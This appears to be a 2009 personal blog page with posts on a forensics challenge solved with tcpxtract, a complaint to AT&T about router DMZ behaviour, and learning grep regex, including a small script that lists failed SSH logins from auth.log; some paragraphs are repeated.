At fist I was thinking what was extracted was more like rar files you can find online. Where you unrar the first file, and the rest are used to build the first. While I was eating I realized that might not be the case, and there may have been 37 different files that were actually transferred. It was a case of having just learned to use tcpxtract.
Once I realized that, I found the files that would open with Ark, and which ones didn't. The ones that didn't I ignored. I then tried to extract the others. Only 2 extracted. Again the others I ignored. One was a manifest file, the other the file I wanted. I looked up the document in the file and got the recipe.
Then after bashing my head around some, I figured out, based on comments others had made and how the file is really stored, to change the un-extracted file's name to the right name, and tried opening it with Open Office. it worked. Grabbed the md5sum off that.
Out of the 6.5 requests in the challenge, I did 5 of them. I never found the magic number. :( and I didn't bother to try to script it (computer program) to do the work for me. Because I never found the magic number, and I don't think my programing skills are sharp enough. Although, I didn't think my computer forensics skills were sharp enough at the beginning either.
Tuesday, August 18, 2009
Another Open Letter to AT&T
Dear AT&T:
On occasion to support my position at work I have to use my home system. One of the things I do is run Nmap (network mapper) on work's Net-Block. I use it to find out what ports are open, and make sure that only the ones that should be are open. I usually do this via an SSH connection from work.
Each time, coming home. I've had problems using my home PC. Trying to access anything on the internet, anything that wasn't an active session when AT&T / 2WIRE did their magic, brings up a page an error page. Other things, like my mail monitoring tool don't have that problem and when I opened my web email, it worked. However going to other sites from there brings back up the error page, and sets off ABE (application boundaries enforcer).
The error page says it's detected "a router behind a router". Which isn't the case. To "FIX / Resolve" the issue, places my home system INTO A NON-PROTECTED DMZ is not an acceptable solution. While I don't have a lot of ports open, I'd still prefer if people didn't have easy access to them. Here is section saying that everything is open.
"Allow all applications (DMZplus mode) – Set the selected computer in DMZplus mode. All inbound traffic, except traffic which has been specifically assigned to another computer using the “Allow individual applications” feature, will automatically be directed to this computer. The DMZplus-enabled computer is less secure because all unassigned firewall ports are opened for that computer."
STOP PUTTING MY EQUIPMENT AT RISK TO BLACK HATS AT&T. FIX YOUR SYSTEM.
On occasion to support my position at work I have to use my home system. One of the things I do is run Nmap (network mapper) on work's Net-Block. I use it to find out what ports are open, and make sure that only the ones that should be are open. I usually do this via an SSH connection from work.
Each time, coming home. I've had problems using my home PC. Trying to access anything on the internet, anything that wasn't an active session when AT&T / 2WIRE did their magic, brings up a page an error page. Other things, like my mail monitoring tool don't have that problem and when I opened my web email, it worked. However going to other sites from there brings back up the error page, and sets off ABE (application boundaries enforcer).
The error page says it's detected "a router behind a router". Which isn't the case. To "FIX / Resolve" the issue, places my home system INTO A NON-PROTECTED DMZ is not an acceptable solution. While I don't have a lot of ports open, I'd still prefer if people didn't have easy access to them. Here is section saying that everything is open.
"Allow all applications (DMZplus mode) – Set the selected computer in DMZplus mode. All inbound traffic, except traffic which has been specifically assigned to another computer using the “Allow individual applications” feature, will automatically be directed to this computer. The DMZplus-enabled computer is less secure because all unassigned firewall ports are opened for that computer."
STOP PUTTING MY EQUIPMENT AT RISK TO BLACK HATS AT&T. FIX YOUR SYSTEM.
Saturday, August 8, 2009
Fun with grep
I got a copy of the Grep Pocket Reference back in early July via PDF format (from O'Reilly's Safari Bookshelf). I read through it but didn't really learn that much.
Last week the hard copy version arrived (2 weeks after I ordered it from Amazon). I've been reading it the last week. The parts I'm going through right now talks about Regular Expressions (regex). I've read about regex more times than I can count, in classes, in shell scripting books, on the web. This time it made sense.
My firewall log parsing for ip addresses has really improved. For example. I'd usually do "grep '< my ip address >' /external/logs/firewall1". The problem my address at work is .18, but it would pull .181 - .189 also. The first thing I did was back slash the . (dots) in the ip address. It cleaned up some stuff from the logs but not much. It's nicer to know that's not looking for any character and only matching what I want it too.
Which was a problem I was having when I wrote failed a few years ago.
Yesterday I read about word boundaries. I tested it this morning with my work IP address, and no longer am I getting the .181 - .189 addresses. Which is fun. It'll make looking for some things easier in the logs at work.
-------
------
I sudo the 2 lines, because I need to be root to access that log file. I didn't want to setuid the script to run, nor did I want to be root when I ran it. It also requires me to type my password to run it, since sudo only remembers my password for 5 minutes.
To make this work on Redhat based systems, change auth.log to secure.log
Last week the hard copy version arrived (2 weeks after I ordered it from Amazon). I've been reading it the last week. The parts I'm going through right now talks about Regular Expressions (regex). I've read about regex more times than I can count, in classes, in shell scripting books, on the web. This time it made sense.
My firewall log parsing for ip addresses has really improved. For example. I'd usually do "grep '< my ip address >' /external/logs/firewall1". The problem my address at work is .18, but it would pull .181 - .189 also. The first thing I did was back slash the . (dots) in the ip address. It cleaned up some stuff from the logs but not much. It's nicer to know that's not looking for any character and only matching what I want it too.
Which was a problem I was having when I wrote failed a few years ago.
Yesterday I read about word boundaries. I tested it this morning with my work IP address, and no longer am I getting the .181 - .189 addresses. Which is fun. It'll make looking for some things easier in the logs at work.
-------
Just for fun, here is what the finished version of Failed looked like (modified slightly):
#! /bin/sh
# checks for /var/log/auth.log for login failures.
# version 0.2
# < my email address removed >
# prints failed invalid users
echo "Failed Invalid User Attempts"
sudo grep "Failed" /var/log/auth.log | grep -i 'invalid' | grep -v '< work login id removed >' | awk '{print $1,$2,$3,$13,$11}' | sort -u
echo ' '
#prints failed vailid users, except for me.
echo "Failed Valid User Attempts"
sudo grep "Failed" /var/log/auth.log | grep -vi 'invalid' | grep -v '< work login id removed >' | grep -v '< home login id removed >' | awk '{print $1,$2,$3,$11,$9}' | sort -u
echo ' '
------
I sudo the 2 lines, because I need to be root to access that log file. I didn't want to setuid the script to run, nor did I want to be root when I ran it. It also requires me to type my password to run it, since sudo only remembers my password for 5 minutes.
To make this work on Redhat based systems, change auth.log to secure.log
Subscribe to:
Posts (Atom)
